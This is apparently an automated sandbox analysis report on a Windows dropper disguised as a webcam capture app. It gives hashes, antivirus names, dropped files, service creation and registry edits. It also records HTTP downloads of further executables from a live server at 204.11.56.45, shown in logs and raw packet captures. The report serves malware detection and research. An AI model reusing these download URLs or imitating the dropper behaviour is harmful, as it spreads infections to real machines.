Analysis Date2015-01-27 00:56:15
MD545e5a3080ee1752b1f9521b2bd9db7bc
SHA1237428dcba3d0b08649b6fde492f5a1627fcac48

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6bd9b013504e0900f79cb19f921e5268 sha1: 1dd70a2d4cb34709c1dc87f5d1b4ea280f8ef701 size: 28672
Section.rdata md5: 7e4dc6f3925e3bbd844abe1404fa3ecc sha1: cb2609275ac1f62c3ebea9dc8cb8bfebb87eb8c5 size: 4096
Section.data md5: 1707b0611b6a9d194dbe6958f859285e sha1: 3cceab212b4ce7754c888085d2fd995e3c24b511 size: 12288
Section.rsrc md5: 6dc71f40e201bd6ab0c5a6f31ecfd971 sha1: cf05f2664bb36df62ce3a63a6b0028c97d36b087 size: 40448
Section.tc md5: b66895d29926164b0057a3dd48630b40 sha1: 2836c3c1de68c0c15897e04e8002b6c832cbe2f1 size: 28672
Timestamp2002-08-22 08:49:58
VersionLegalCopyright: VM., 2002.
FileDescription: Still Image(STI) Application
FileVersion: 4.2.618.35
OriginalFilename: StillCap.exe
CompanyName: VM
PEhashb9c181446e6c6214bc0941c4ed04e8c9d4af927c
IMPhash79a1ab37da36cff15bf347149fc3fab3
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Crypt-RPT [Trj]
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsError Scanning File
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\2aa6_appcompat.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 436 -e 152 -g
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 196
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 436 -e 152 -g

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 800

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\4L6NSLAV\desktop.ini
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CX6ZKLI3\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\9JBUM5O7\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\V2QU2QN9\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS204.11.56.45
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1204

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1888

Process
↳ Pid 1192

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSwww.baidu.com
Type: A
DNSnbtj.114anhui.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
080404b0
176*144
320*240
352*288
4.2.618.35
640*480
About
Browser
Cancel
&Capture Image
CompanyName
Copyright (C) 2001
{E76F3027-CA52-468e-B06E-2F32E2F6B59E}
{E76F3028-CA52-468e-B06E-2F32E2F6B59E}
&Edit
&File
FILE
FileDescription
FileVersion
Filter Pro...
Format
         (((((                  H
h&About ...
Hello World!
&Help
I420
IDD_BROWSER
IDR_POP_MENU
iE&xit
@jjjj
LegalCopyright
OriginalFilename
Pin Pro...
RGB24
&Save
Save &as
Save &As
Size
StillCap
STILLCAP
StillCap.exe
StillCap Version 4.2.1.19
Still Image(STI) Application
StringFileInfo
System
Test
Translation
USB PC Camera (Z302)
VarFileInfo
Video
VM., 2002.
VS_VERSION_INFO
										
													
																								
 0+020e0k0
0,0A0^0s0
08101BB
0j/0@0E0R0f0
0T0X0\0`0d0h0l0p0t0x0|
1=>=F=
:1G1P1]1
1K1Z1h1
?%?2?]?
2(2B2N2W2c2n
2<2Q{h2p2
2?3H3Q
2D2J2O2U2b1n2t2
>2>E>S>\>s>
2K2f2v2
2T2d2{2
3$30l3Xk
343=3B3j3p3|3
*37}Cg
;3D;H;L
@3T3e3
4&414]4
4%4+4G4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
5!6&6/6
)56Ab5t5
;!;+;5;?;C;J;
:5:F:Y:w:|:
6.6:6C6M6W6\6
6<6]6i6
6!71767D7R7^7i7p7
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
>!>*>8>B>H>V>`>
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e
-9;9A9F9
9ao^@q
9.:U:p:}:
A4J4Y4_4
A67-586
abnormal program termination
ADVAPI32.dll
AE4C57'
agX \s
All Files (*.*)
a Play
appmgmts.dlld
"bd	WVS
BeginPaint
bgTLOkN
BMP File (*.bmp)
browser
C1E870B0C
CancelConne
 cannot be run i
CheckRadioButton
ClientToScreen
CloseHandle
comdlg32.dll
CopyFileA
Copyro
CP<Z<|<
CreateCompatibleBitmap
CreateCompatibleDC
CreateDialogParamA
CreateEventA
CreateFileA
CreateProcessA
CreateThread
CreateWindowExA
crypt'c
+D$ _^][
D$ _^]
D0H0L0PM
D$8QVRh 
DA-6D69-472e-8981-DBC71
@.data
Ddk h$
default
DefWindowProcA
DeleteDC
DeleteObject
DestroyWindow
DeviceName
(D/fc_oL
DialogBoxParamA
DispatchMessageA
DOMAIN error
DOS mode.
D$(PWSUQ
D$$RVPj
D$<SUh4
dU5 B~
&=,=D=v=
D$ _^][Y
E8J8O8[8`8i8o8z8
EnableMenuItem
EndDialog
EndPaint
ep1'*"/
eParam$
Esht*6
ExecuUA
ExitProcess
Expor.exe
F??3@YAXP
f+D?	D
- floating point not loaded
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
~Fun Loving Criminal~
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetMenu
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetSaveFileNameA
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSystemMenu
GetTempPathA
GetVersion
GetWindowRect
GetWindowsDirectoryA
h1l1.T
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HSUVWh
Hur3'$
IDD_BROWSER
IDR_POP_MENU
iD&YomH
ifyTrLo
igVCRT
InfGma
ingCompatibil
InvalidateRect
IocSymd
i|tlh`
IXR-!m
_;i;z;
 -k 4/
kca:\lsa
KERNEL32.dll
KERNEL32.DLL
KEveny
K:\Q.pdb`q
L5PFHP7b
LCMapStringA
LCMapStringW
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
LoadMenuA
LoadStringA
LocalFree
lp6a J
L$ PPVQj
L$ RQP
lstrcatA
lstrcpyA
L$ UQSRP
m1\U\Kcn
M:d:m:
MessageBoxA
Microsoft Visual C++ Runtime Library
MSN Gam
MSVCRT.dll
MultiByteToWideChar
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
 NT\Curr
NtQu9y
Nv`mG}
oft\Wud
o@P3e4
Op-;4$
~OPEN=-
+OpsSCM
|otB.8
,ov\A}
PathFileExistsA
PostMessageA
PostQuitMessage
Program: 
<program name unknown>
- pure virtual function call
pVKwOf
PWVh`6@
P;Z;d;n;x;
q$A3<.
qidu.com
QQQQQQQ
\Ra7207
 `.rdat[
.rdata
ReadFile
RECYCLER
RedrawWindow
RegCloseKey
RegisterClassExA
RegOpenKeyA
RegQueryValueExA
Remote
_rju@_fd
-<RoA%'_h7
RtlIoU
RtlUnwind
runtime error 
Runtime Error!
S1[1`1m1
{schedsvc
SDPSRV
SelectObject
SetEndOfFile
SetEvent
SetFilePointer
SetHandleCount
SetPixel
SetStdHandle
SetWindowPos
SHLWAPI.dll
ShowWindow
SING error
SOFTWARE\Mi
SOFTWARE\ZSMC\USBCAMERA\ZC0302\TWAIN
Sp`FFF
\STIcap
StiCreateInstanceW
STI.dll
StretchBlt
SUVWjdPjjQ
s_/UYY
SVWjdPjjQ
swsocknetman1ssdp
T$0QPj
T$0Rh<
.tcLCI0
TerminateProcess
.textVT
The Stream hasn't open yet. Or you shoud close the Stillcap.exe and restart it
_This #g
!This program cannot be run in DOS mode.
TLOSS error
tl`TDi
ToFilnH
tpHt:H
TrackPopupMenu
TranslateAcceleratorA
TranslateMessage
T$(SSSSWQh 
tTisrv
t.;t$$t(
/;t$$u
T$$WSR
?%_#txg
>"u:F@
	U;MhOy
uMpr.{
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UpdateWindow
#upnphostKn&s
URLDown
user32.dll
USER32.dll
|$$UWQ
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
VC20XC00U
v|htcL
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
VPWSUQ
vThfad
VUWPh 
\v:.X$
W0YX0wx
|w9=trW
WaitForSingleObject
WideCharToMultiByte
 winsta0
WithTag	
WmdmPmSN'Fa
WO$_9E
Writea7
WriteFile
wsprintfA
WUVQh 
<	=x=}=
/X,.CC
 X -ibcB"
<)<.<X<i<o
xmlpbS
{+xN{?ODBE
XPTPSW
XPVSSG
XRichS
xwuLEwE
XX; tg
/;%y;~;
.y!GN&
You should capture image first!
|/Yr3Y
*y/.uzyzuEFz8GD
y%*+vp*vCpuC%
/YW'RB
@z}]u2o